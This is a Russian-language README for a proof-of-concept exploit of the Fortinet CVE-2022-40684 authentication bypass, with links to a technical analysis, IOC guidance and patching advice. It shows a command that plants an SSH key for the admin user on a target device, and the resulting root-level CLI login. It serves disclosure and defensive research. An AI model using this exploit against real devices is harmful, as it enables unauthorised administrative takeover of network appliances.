
POC для CVE-2022-40684, затрагивающий устройства Fortinet FortiOS, FortiProxy и FortiSwitchManager.
Технический анализ первопричины уязвимости можно найти в нашем блоге: https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684
Для анализа журналов Fortinet на предмет индикаторов компрометации и сведений о том, как включить более подробное журналирование, ознакомьтесь с нашим блогом об IOC: https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/
Этот POC использует уязвимость обхода аутентификации для установки SSH-ключа для указанного пользователя.
root@kali:~# python3 CVE-2022-40684.py -t 10.0.40.67 --username admin --key-file ~/.ssh/id_rsa.pub
[+] SSH key for admin added successfully!
root@kali:~# ssh [email protected]
fortios_7_2_1 #
config Configure object.
get Get dynamic and system information.
show Show configuration.
diagnose Diagnose facility.
execute Execute static commands.
alias Execute alias commands.
exit Exit the CLI.
Обновитесь до последней версии или примените меры, следуя инструкциям в Fortinet PSIRT
Данное программное обеспечение создано исключительно для академических исследований и разработки эффективных методов защиты и не предназначено для атаки на системы, за исключением случаев явного разрешения. Сопровождающие проекта не несут ответственности за неправомерное использование программного обеспечения. Используйте ответственно.